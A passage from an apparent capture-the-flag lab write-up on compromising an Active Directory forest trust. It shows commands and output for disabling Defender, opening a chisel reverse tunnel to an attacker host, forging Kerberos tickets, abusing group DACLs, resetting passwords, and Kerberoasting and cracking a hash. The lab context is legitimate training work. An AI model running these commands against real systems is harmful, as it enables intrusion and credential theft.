dpapi_userkey:0x38ee7d0b94d5ab6c0a1f38ca94523bdc7e38f196
SMB 10.0.10.5 445 DC [+] Dumped 6 LSA secrets to /home/kali/.nxc/logs/lsa/DC_10.0.10.5_2026-08-25_043741.secrets and /home/kali/.nxc/logs/lsa/DC_10.0.10.5_2026-08-25_043741.cached
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ cat Forest_Trust_Validation.eml
Hello,

As part of the validation of the recently established forest trust between WESTBRIDGE.HSM and WESTBRIDGE-RESEARCH.HSM, the researchoperator account in the WESTBRIDGE.HSM forest has been authorized to authenticate to the WESTBRIDGE-RESEARCH.HSM forest via the established cross-realm trust. The account has been designated as the owner of the Research Web Operations Global Security Group, which manages authorized operational access to the research web infrastructure.

Please note that the WESTBRIDGE-RESEARCH.HSM forest enforces Kerberos-only authentication for domain access. NTLM is disabled for domain authentication and LDAP access as part of the security baseline. Consequently, all domain logons, LDAP communication, and cross-forest authentication to the research forest must be performed using Kerberos.

The credentials required for the validation process are stored in the attached KeePass database.

KeePass Password: eJ6jSnz1z7T4chkJ

If you encounter any Kerberos, LDAP, or cross-forest authentication issues during testing, please notify the Infrastructure Services team.

Regards,

Administrator
WESTBRIDGE.HSM / WESTBRIDGE-RESEARCH.HSM
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

That’s Domain Admin over westbridge.hsm. The DC’s C$ yields the flag, a Database.kdb, and a telling Forest_Trust_Validation.eml,

We obtained valid credentials for the researchoperator account in the WESTBRIDGE.HSM forest, which was authorized to authenticate across the established trust with WESTBRIDGE-RESEARCH.HSM.

1
Flag05[ADCS_*****]

Phase 8 - Pivoting the forest trust to the research domain

BloodHound - the bidirectional CrossForestTrust between the two forests:

The .eml and KeePass DB hand us the bridge. The email carries the KeePass password and describes the trust; kpcli then coughs up researchoperator

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ kpcli --kdb Database.kdb
Provide the master password: *************************

KeePass CLI (kpcli) v4.1.3 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
westbridge.hsm/
westbridge-research.hsm/
kpcli:/> cd westbridge.hsm/
kpcli:/westbridge.hsm> ls
=== Groups ===
Default Passwords/
Linux /
MSSQL/
Service Accounts/
Support Portal /
kpcli:/westbridge.hsm> cd Default\ Passwords/
kpcli:/westbridge.hsm/Default Passwords> ls
=== Entries ===
0. Default Domain Password
kpcli:/westbridge.hsm/Default Passwords> cd ..
kpcli:/westbridge.hsm> cd ..
kpcli:/> ls
=== Groups ===
westbridge.hsm/
westbridge-research.hsm/
kpcli:/> cd westbridge-research.hsm/
kpcli:/westbridge-research.hsm> ls
=== Groups ===
Privileged Accounts/
kpcli:/westbridge-research.hsm> cd Privileged\ Accounts/
kpcli:/westbridge-research.hsm/Privileged Accounts> ls
=== Entries ===
0. researchoperator
kpcli:/westbridge-research.hsm/Privileged Accounts> show -f researchoperator

Title: researchoperator
Uname: researchoperator
Pass: XWkZ9o5T0c65djgYWl
URL:
Notes: The **researchoperator** account is a member of the **Research Web Operations** group with operational access to **WEB.WESTBRIDGE-RESEARCH.HSM**.

kpcli:/westbridge-research.hsm/Privileged Accounts>
kpcli:/westbridge-research.hsm/Privileged Accounts> exit
Please consider supporting kpcli development by sponsoring its author:
https://github.com/sponsors/hightowe

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

From the RDP session on DC01 using the hacker account, we collected BloodHound data from DC02

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
PS C:\Users\hacker\Downloads> ping DC02.westbridge-research.hsm

Pinging dc02.westbridge-research.hsm [10.0.20.5] with 32 bytes of data:
Reply from 10.0.20.5: bytes=32 time<1ms TTL=128
Reply from 10.0.20.5: bytes=32 time<1ms TTL=128

Ping statistics for 10.0.20.5:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Control-C
PS C:\Users\hacker\Downloads> ping web.westbridge-research.hsm

Pinging web.westbridge-research.hsm [10.0.20.10] with 32 bytes of data:
Reply from 10.0.20.10: bytes=32 time<1ms TTL=128
Reply from 10.0.20.10: bytes=32 time<1ms TTL=128

Ping statistics for 10.0.20.10:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Control-C
PS C:\Users\hacker\Downloads>

Used runas to start cmd as researchoperator user and dumped bloodhound data with sharphound from DC01 to DC02

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
PS C:\Users\hacker\Downloads> runas /netonly /user:westbridge.hsm\researchoperator powershell.exe
Enter the password for westbridge.hsm\researchoperator:
Attempting to start powershell.exe as user "westbridge.hsm\researchoperator" ...
PS C:\Users\hacker\Downloads>
PS C:\Users\hacker\Downloads> .\SharpHound.exe -c All -d westbridge-research.hsm --domaincontroller DC02.westbridge-research.hsm --outputdirectory C:\Users\hacker\Downloads --zipfilename research
2026-08-25T08:56:49.3966830+00:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-08-25T08:56:49.4239186+00:00|INFORMATION|SharpHound Version: 2.14.0.0
2026-08-25T08:56:49.4239186+00:00|INFORMATION|SharpHound Common Version: 4.7.0.0
2026-08-25T08:56:49.5685731+00:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-08-25T08:56:49.6066837+00:00|INFORMATION|Initializing SharpHound at 8:56 AM on 8/25/2026
2026-08-25T08:56:49.8042471+00:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-08-25T08:56:49.9162295+00:00|INFORMATION|Beginning LDAP search for westbridge-research.hsm
2026-08-25T08:56:49.9182428+00:00|INFORMATION|Collecting AdminSDHolder data for westbridge-research.hsm
2026-08-25T08:56:49.9815911+00:00|INFORMATION|AdminSDHolder ACL hash 58F13BD63729BB1D33DE3FD39F77891F47009613 calculated for westbridge-research.hsm.
2026-08-25T08:56:50.7568323+00:00|INFORMATION|Beginning LDAP search for westbridge-research.hsm Configuration NC
2026-08-25T08:56:51.0139928+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for WESTBRIDGE-RESEARCH.HSM
2026-08-25T08:56:52.6709378+00:00|INFORMATION|Producer has finished, closing LDAP channel
2026-08-25T08:56:52.6749628+00:00|INFORMATION|LDAP channel closed, waiting for consumers
2026-08-25T08:57:19.9062859+00:00|INFORMATION|Status: 285 objects finished (+285 9.5)/s -- Using 82 MB RAM
2026-08-25T08:57:39.6148308+00:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2026-08-25T08:57:39.6539226+00:00|INFORMATION|Output channel closed, waiting for output task to complete
2026-08-25T08:57:39.7808488+00:00|INFORMATION|Status: 319 objects finished (+34 6.510204)/s -- Using 82 MB RAM
2026-08-25T08:57:39.7828703+00:00|INFORMATION|Enumeration finished in 00:00:49.8798889
2026-08-25T08:57:39.9577248+00:00|INFORMATION|Saving cache with stats: 19 ID to type mappings.
0 name to SID mappings.
1 machine sid mappings.
5 sid to domain mappings.
0 global catalog mappings.
2026-08-25T08:57:40.0175978+00:00|INFORMATION|SharpHound Enumeration Completed at 8:57 AM on 8/25/2026! Happy Graphing!
PS C:\Users\hacker\Downloads>

researchoperator lives in the parent domain but is authorised into the child forest, so we ride the trust with cross-realm Kerberos (everything proxied through the DC via chisel/proxychains - the research subnet isn’t directly routable). NTLM is off, so it must be Kerberos:

From RDP session of DC01

1
2
3
PS C:\Users\hacker> Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
PS C:\Users\hacker> Add-MpPreference -ExclusionPath "C:\Temp"
PS C:\Users\hacker> cd C:\Temp

Excluded Temp dir and ran chisel as socks5 proxy

1
2
3
PS C:\Temp> C:\Temp\chisel.exe client 192.168.211.2:9002 R:1080:socks
2026/08/25 14:50:34 client: Connecting to ws://192.168.211.2:9002
2026/08/25 14:50:36 client: Connected (Latency 285.8041ms)

From attacker machine (kali)

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ chisel server -p 9002 --reverse
2026/08/25 10:40:16 server: Reverse tunnelling enabled
2026/08/25 10:40:16 server: Fingerprint WdHORbaoE5SDS33jim++ftwehrdJiOKCieIRdwx+N+8=
2026/08/25 10:40:16 server: Listening on http://0.0.0.0:9002
2026/08/25 10:50:36 server: session#1: Client version (1.11.8) differs from server version (1.12.0~rc2-0kali1)
2026/08/25 10:50:36 server: session#1: Open (user=- addr=10.0.10.5:49900 remotes=R:127.0.0.1:1080:socks)
2026/08/25 10:50:36 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

We first obtained a TGT for the researchoperator account from the WESTBRIDGE.HSM forest.

1
2
3
4
5
6
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-getTGT westbridge.hsm/researchoperator:'XWkZ9o5T0c65djgYWl' -dc-ip 10.0.10.5
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in researchoperator.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

We then used the Kerberos ticket to obtain a cross-forest ticket for the WESTBRIDGE-RESEARCH.HSM realm and subsequently requested an LDAP service ticket for DC02.

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ export KRB5CCNAME="./researchoperator.ccache" && proxychains4 -q impacket-getST -k -no-pass -spn 'krbtgt/WESTBRIDGE-RESEARCH.HSM' -dc-ip 10.0.10.5 westbridge.hsm/researchoperator
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting ST for user
[*] Saving ticket in researchoperator@krbtgt_WESTBRIDGE-RESEARCH.HSM@WESTBRIDGE.HSM.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ export KRB5CCNAME="./researchoperator@krbtgt_WESTBRIDGE-RESEARCH.HSM@WESTBRIDGE.HSM.ccache" && proxychains4 -q impacket-getST -k -no-pass -spn 'ldap/DC02.westbridge-research.hsm' -dc-ip 10.0.20.5 'westbridge-research.hsm/researchoperator'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting ST for user
[*] Saving ticket in researchoperator@ldap_DC02.westbridge-research.hsm@WESTBRIDGE-RESEARCH.HSM.ccache

With the LDAP service ticket, we authenticated to DC02 using Kerberos and enumerated the objects that researchoperator could modify.

Group-DACL abuse → targeted kerberoast

researchoperator owns the Research Web Operations group (WriteDACL/Owner). We grant ourselves GenericAll, flip the group type, add our SID, and reset the three members (r.parker, t.walker, m.carter):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ export KRB5CCNAME="./researchoperator@ldap_DC02.westbridge-research.hsm@WESTBRIDGE-RESEARCH.HSM.ccache"
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ proxychains4 -q bloodyAD -i 10.0.20.5 --host DC02.westbridge-research.hsm -d westbridge-research.hsm -u researchoperator -k get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=westbridge-research,DC=hsm
permission: WRITE

distinguishedName: CN=Research Web Operations,CN=Users,DC=westbridge-research,DC=hsm
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

distinguishedName: CN=S-1-5-21-1978613116-3728955385-531918137-9519,CN=ForeignSecurityPrincipals,DC=westbridge-research,DC=hsm
permission: WRITE

distinguishedName: DC=westbridge-research.hsm,CN=MicrosoftDNS,DC=DomainDnsZones,DC=westbridge-research,DC=hsm
permission: CREATE_CHILD

distinguishedName: DC=_msdcs.westbridge-research.hsm,CN=MicrosoftDNS,DC=ForestDnsZones,DC=westbridge-research,DC=hsm
permission: CREATE_CHILD

distinguishedName: DC=westbridge.hsm,CN=MicrosoftDNS,DC=ForestDnsZones,DC=westbridge-research,DC=hsm
permission: CREATE_CHILD

Using the researchoperator privileges, we granted GenericAll permissions over the Research Web Operations group to the specified security principal.

1
2
3
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ proxychains4 -q bloodyAD -i 10.0.20.5 --host DC02.westbridge-research.hsm -d westbridge-research.hsm -u researchoperator -k add genericAll 'CN=Research Web Operations,CN=Users,DC=westbridge-research,DC=hsm' 'S-1-5-21-1978613116-3728955385-531918137-9519'
[+] S-1-5-21-1978613116-3728955385-531918137-9519 has now GenericAll on CN=Research Web Operations,CN=Users,DC=westbridge-research,DC=hsm

Changed the Research Web Operations group type to a Universal Security Group, enabling it to be used for cross-forest group membership and access.

1
2
3
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ proxychains4 -q bloodyAD -i 10.0.20.5 --host DC02.westbridge-research.hsm -d westbridge-research.hsm -u researchoperator -k set object 'CN=Research Web Operations,CN=Users,DC=westbridge-research,DC=hsm' grouptype -v -2147483644
[+] CN=Research Web Operations,CN=Users,DC=westbridge-research,DC=hsm's groupType has been updated
1
2
3
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ proxychains4 -q bloodyAD -i 10.0.20.5 --host DC02.westbridge-research.hsm -d westbridge-research.hsm -u researchoperator -k add groupMember 'CN=Research Web Operations,CN=Users,DC=westbridge-research,DC=hsm' S-1-5-21-1978613116-3728955385-531918137-9519
[+] S-1-5-21-1978613116-3728955385-531918137-9519 added to CN=Research Web Operations,CN=Users,DC=westbridge-research,DC=hsm

The RESEARCH WEB OPERATIONS group has delegated privileges to reset the passwords of r.parker, m.carter, and t.walker without requiring their existing passwords, which was leveraged to reset all three accounts.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ proxychains4 -q bloodyAD -i 10.0.20.5 --host DC02.westbridge-research.hsm -d westbridge-research.hsm -u researchoperator -k set password r.parker 'Pass123456'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ proxychains4 -q bloodyAD -i 10.0.20.5 --host DC02.westbridge-research.hsm -d westbridge-research.hsm -u researchoperator -k set password t.walker 'Pass123456'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ proxychains4 -q bloodyAD -i 10.0.20.5 --host DC02.westbridge-research.hsm -d westbridge-research.hsm -u researchoperator -k set password m.carter 'Pass123456'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ proxychains4 -q impacket-getTGT westbridge-research.hsm/r.parker:'Pass123456' -dc-ip 10.0.20.5
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in r.parker.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ proxychains4 -q impacket-getTGT westbridge-research.hsm/m.carter:'Pass123456' -dc-ip 10.0.20.5
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in m.carter.ccache
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5CCNAME="$PWD/r.parker.ccache" proxychains4 -q nxc smb WEB.westbridge-research.hsm -u r.parker -k --use-kcache
SMB WEB.westbridge-research.hsm 445 WEB [*] Windows 11 / Server 2025 Build 26100 x64 (name:WEB) (domain:westbridge-research.hsm) (signing:True) (SMBv1:None)
SMB WEB.westbridge-research.hsm 445 WEB [+] WESTBRIDGE-RESEARCH.HSM\r.parker from ccache

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5CCNAME="$PWD/t.walker.ccache" proxychains4 -q nxc smb WEB.westbridge-research.hsm -u t.walker -k --use-kcache
SMB WEB.westbridge-research.hsm 445 WEB [*] Windows 11 / Server 2025 Build 26100 x64 (name:WEB) (domain:westbridge-research.hsm) (signing:True) (SMBv1:None)
SMB WEB.westbridge-research.hsm 445 WEB [+] WESTBRIDGE-RESEARCH.HSM\t.walker from ccache

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5CCNAME="$PWD/m.carter.ccache" proxychains4 -q nxc smb WEB.westbridge-research.hsm -u m.carter -k --use-kcache
SMB WEB.westbridge-research.hsm 445 WEB [*] Windows 11 / Server 2025 Build 26100 x64 (name:WEB) (domain:westbridge-research.hsm) (signing:True) (SMBv1:None)
SMB WEB.westbridge-research.hsm 445 WEB [+] WESTBRIDGE-RESEARCH.HSM\m.carter from ccache

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5CCNAME="$PWD/t.walker.ccache" proxychains4 -q nxc ldap DC02.westbridge-research.hsm -u t.walker -k --use-kcache --users
LDAP DC02.westbridge-research.hsm 389 DC02 [*] None (name:DC02) (domain:WESTBRIDGE-RESEARCH.HSM) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP DC02.westbridge-research.hsm 389 DC02 [+] WESTBRIDGE-RESEARCH.HSM\t.walker from ccache
LDAP DC02.westbridge-research.hsm 389 DC02 [*] Enumerated 8 domain users: WESTBRIDGE-RESEARCH.HSM
LDAP DC02.westbridge-research.hsm 389 DC02 -Username- -Last PW Set- -BadPW- -Description-
LDAP DC02.westbridge-research.hsm 389 DC02 Administrator 2026-07-12 08:02:30 0 Built-in account for administering the computer/domain
LDAP DC02.westbridge-research.hsm 389 DC02 Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP DC02.westbridge-research.hsm 389 DC02 krbtgt 2026-07-05 03:59:12 0 Key Distribution Center Service Account
LDAP DC02.westbridge-research.hsm 389 DC02 r.parker 2026-08-26 02:24:53 0
LDAP DC02.westbridge-research.hsm 389 DC02 m.carter 2026-08-26 02:37:06 0
LDAP DC02.westbridge-research.hsm 389 DC02 t.walker 2026-08-26 02:25:05 0
LDAP DC02.westbridge-research.hsm 389 DC02 j.bones 2026-07-05 06:22:01 0
LDAP DC02.westbridge-research.hsm 389 DC02 a.howard 2026-07-06 14:37:54 0

Used the targeted Kerberoasting privilege associated with t.walker to add an SPN to the j.bones account, making it Kerberoastable and allowing us to obtain its service account credentials.

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5CCNAME="./t.walker.ccache" proxychains4 -q bloodyAD --host DC02.westbridge-research.hsm -d WESTBRIDGE-RESEARCH.HSM -u t.walker -k set object j.bones servicePrincipalName -v 'HTTP/jbones.westbridge-research.hsm'
[+] j.bones's servicePrincipalName has been updated
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5CCNAME="$PWD/t.walker.ccache" proxychains4 -q nxc ldap DC02.westbridge-research.hsm -u t.walker -k --use-kcache --kerberoasting output.txt --kerberoast-account J.BONES
LDAP DC02.westbridge-research.hsm 389 DC02 [*] None (name:DC02) (domain:WESTBRIDGE-RESEARCH.HSM) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP DC02.westbridge-research.hsm 389 DC02 [+] WESTBRIDGE-RESEARCH.HSM\t.walker from ccache
LDAP DC02.westbridge-research.hsm 389 DC02 [*] Total of records returned 1
LDAP DC02.westbridge-research.hsm 389 DC02 [*] sAMAccountName: j.bones, memberOf: CN=Research Web Administrators,CN=Users,DC=westbridge-research,DC=hsm, pwdLastSet: 2026-07-05 06:22:01.394037, lastLogon: 2026-07-10 17:57:01.026592
LDAP DC02.westbridge-research.hsm 389 DC02 $krb5tgs$18$j.bones$WESTBRIDGE-RESEARCH.HSM$*westbridge-research.hsm\j.bones*$bf8049b35b56a492f44eab20$dbca6523c1b0375766f7a01a72fc310d2f0c1e8152968f5cf9bed9f4203419a6bab83ab45b2223132c3aa00530ce071433c4c7d4e016dd4acfd0a0b68bff31ecd8cd726aa73fb3a79a492af8a171dd11fd77ffae6a449bbcefcb5e791f3401d57b2d002f2ec1670122e3bebed447d4a6969b90e94b426292b74c6b366e3a6d8a2c747f6f566e9906b0ae04c87cd2eb66b89d0acf144d442ca6e80c05f3bd5b476a5d68f484345241664b7131ea136ab5c9fec20410c85f2dac0c37a3d54b28cda12ebce7a75d898ef6b1799c1c260636dc2ccd2af28fb2dd5eb96a935a4b869f1b60c9a7cd0d1cfa65771044a6042764895a86191b9e4bf1887a99d1261928c9a1947d3e305f3cffbb8d556e28de1140685eca4c59084ed47d3903f79208a1679ce89746b797ee381126205cc9898ad5d625cb2803b034921764ca15698521bcfe7fb3e79d19384ddd208b77a7f2ccf0568e53e1fabd1d6b5908bc890e803dd9cef4e5cf21586e4a49099b147cb1c55271dbf2c6443f92316b8927c8e6d4e50e1154bd3bebca9e9dc0ec5ff17842e634715572d1c4f1ec3effc11ae0ee8309827d2bc2378af5dcb7c7b0d21d195e742ed07d37b47389f64c86506c5ed3b61b96835649869de0e7787bd13e7002d4f9e9bc24131588387d243a00c073cbc201c500a22b5d2a4d5879586175ad14cd166c4a1186bafc0fa1c5a20756521cd3449248403a8857f9f533f40d8a90c4559728afe8281b1d20e1b0306e617304046bf751302f660e1d3c3cf977c7330a0ad73ce9f7e24e0ecc08afaa574542b2f382e2147c2cdec0be760ea4b6d4e5c064cc1fba6d63e140e7b1d7b000fb593b34328fcd45c07176b2047a5becddee07cafe78870bdc8387c3f2076471b8466f6becdaac3737651d9db2f2f05596b48900cdd3ce6101976da43c3abfb5e1fedc2451d20a38ce4554b304eb419c04f37cb331af5be0c83aa336a419bb961a963769d10b0550a5b282192c0ab890a479a597e8b6870c5840d466e5b345dfb6c6d9dfa67aa8157f39244cacd06db4d7ab31be68123593bf9d93321c70faf13c3d2896bb1f7c9164bd68f7e09b3fd441e1b4f0053bbfa7ef5e4fb0d28ab78fb9536baa5140255439065eb15fda843db548cf66473d0f456c12615bf86dc806796905104ae7853528707c2820ddf0b18005576775374cbd7473edc1f3bbf334ca6c70e745ff52d94b22cbc7d6dd9ab906353b8312fbe951dcaac0746adbe9f105f9babba5d9658d28be6f6219c3cb1e10b544915c1a9648213db51f9a4b22006fa6d506970d9530a6e96481cf212982712e5209eecaa4456673958b84cf2b182815cf7559d361ed30c288ee04a1f256626e736286447f97da30f8932311eada172b9c19f7cb3200cd28b2cf6f9e805291513c3d40b13c158bd4070da1489288253cc5343992646a383bc01b9d29f07057559b092445b0fb6ab4eff5c7ae22b3f4cdb0339bf2c06375c2696a0e5e9c1e9d7436902f383d132f845c431852619a85dcc0b7c246888ace235b331bedc48896cac2922a14a85b7f6331fcfe92e78b83cd6da80d39d874f043c30b4ff1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ hashcat -m 19700 j.bones-hash rockyou_costum.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-11th Gen Intel(R) Core(TM) i5-11400H @ 2.70GHz, 3856/7713 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 513 MB (7892 MB free)

Dictionary cache hit:
* Filename..: rockyou_costum.txt
* Passwords.: 5005
* Bytes.....: 49090
* Keyspace..: 5005

Approaching final keyspace - workload adjusted.

$krb5tgs$18$j.bones$WESTBRIDGE-RESEARCH.HSM$bf8049b35b56a492f44eab20$dbca6523c1b0375766f7a01a72fc310d2f0c1e8152968f5cf9bed9f4203419a6bab83ab45b2223132c3aa00530ce071433c4c7d4e016dd4acfd0a0b68bff31ecd8cd726aa73fb3a79a492af8a171dd11fd77ffae6a449bbcefcb5e791f3401d57b2d002f2ec1670122e3bebed447d4a6969b90e94b426292b74c6b366e3a6d8a2c747f6f566e9906b0ae04c87cd2eb66b89d0acf144d442ca6e80c05f3bd5b476a5d68f484345241664b7131ea136ab5c9fec20410c85f2dac0c37a3d54b28cda12ebce7a75d898ef6b1799c1c260636dc2ccd2af28fb2dd5eb96a935a4b869f1b60c9a7cd0d1cfa65771044a6042764895a86191b9e4bf1887a99d1261928c9a1947d3e305f3cffbb8d556e28de1140685eca4c59084ed47d3903f79208a1679ce89746b797ee381126205cc9898ad5d625cb2803b034921764ca15698521bcfe7fb3e79d19384ddd208b77a7f2ccf0568e53e1fabd1d6b5908bc890e803dd9cef4e5cf21586e4a49099b147cb1c55271dbf2c6443f92316b8927c8e6d4e50e1154bd3bebca9e9dc0ec5ff17842e634715572d1c4f1ec3effc11ae0ee8309827d2bc2378af5dcb7c7b0d21d195e742ed07d37b47389f64c86506c5ed3b61b96835649869de0e7787bd13e7002d4f9e9bc24131588387d243a00c073cbc201c500a22b5d2a4d5879586175ad14cd166c4a1186bafc0fa1c5a20756521cd3449248403a8857f9f533f40d8a90c4559728afe8281b1d20e1b0306e617304046bf751302f660e1d3c3cf977c7330a0ad73ce9f7e24e0ecc08afaa574542b2f382e2147c2cdec0be760ea4b6d4e5c064cc1fba6d63e140e7b1d7b000fb593b34328fcd45c07176b2047a5becddee07cafe78870bdc8387c3f2076471b8466f6becdaac3737651d9db2f2f05596b48900cdd3ce6101976da43c3abfb5e1fedc2451d20a38ce4554b304eb419c04f37cb331af5be0c83aa336a419bb961a963769d10b0550a5b282192c0ab890a479a597e8b6870c5840d466e5b345dfb6c6d9dfa67aa8157f39244cacd06db4d7ab31be68123593bf9d93321c70faf13c3d2896bb1f7c9164bd68f7e09b3fd441e1b4f0053bbfa7ef5e4fb0d28ab78fb9536baa5140255439065eb15fda843db548cf66473d0f456c12615bf86dc806796905104ae7853528707c2820ddf0b18005576775374cbd7473edc1f3bbf334ca6c70e745ff52d94b22cbc7d6dd9ab906353b8312fbe951dcaac0746adbe9f105f9babba5d9658d28be6f6219c3cb1e10b544915c1a9648213db51f9a4b22006fa6d506970d9530a6e96481cf212982712e5209eecaa4456673958b84cf2b182815cf7559d361ed30c288ee04a1f256626e736286447f97da30f8932311eada172b9c19f7cb3200cd28b2cf6f9e805291513c3d40b13c158bd4070da1489288253cc5343992646a383bc01b9d29f07057559b092445b0fb6ab4eff5c7ae22b3f4cdb0339bf2c06375c2696a0e5e9c1e9d7436902f383d132f845c431852619a85dcc0b7c246888ace235b331bedc48896cac2922a14a85b7f6331fcfe92e78b83cd6da80d39d874f043c30b4ff1:8brokenbones8

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 19700 (Kerberos 5, etype 18, TGS-REP)
Hash.Target......: $krb5tgs$18$j.bones$WESTBRIDGE-RESEARCH.HSM$bf8049b...0b4ff1
Time.Started.....: Wed Aug 26 02:52:22 2026 (0 secs)
Time.Estimated...: Wed Aug 26 02:52:22 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (rockyou_costum.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 13404 H/s (14.17ms) @ Accel:221 Loops:1024 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5005/5005 (100.00%)
Rejected.........: 0/5005 (0.00%)
Restore.Point....: 4420/5005 (88.31%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:3072-4095
Candidate.Engine.: Device Generator
Candidates.#01...: holasexy123 -> sexcluff
Hardware.Mon.#01.: Util: 37%
Started: Wed Aug 26 02:52:18 2026
Stopped: Wed Aug 26 02:52:23 2026

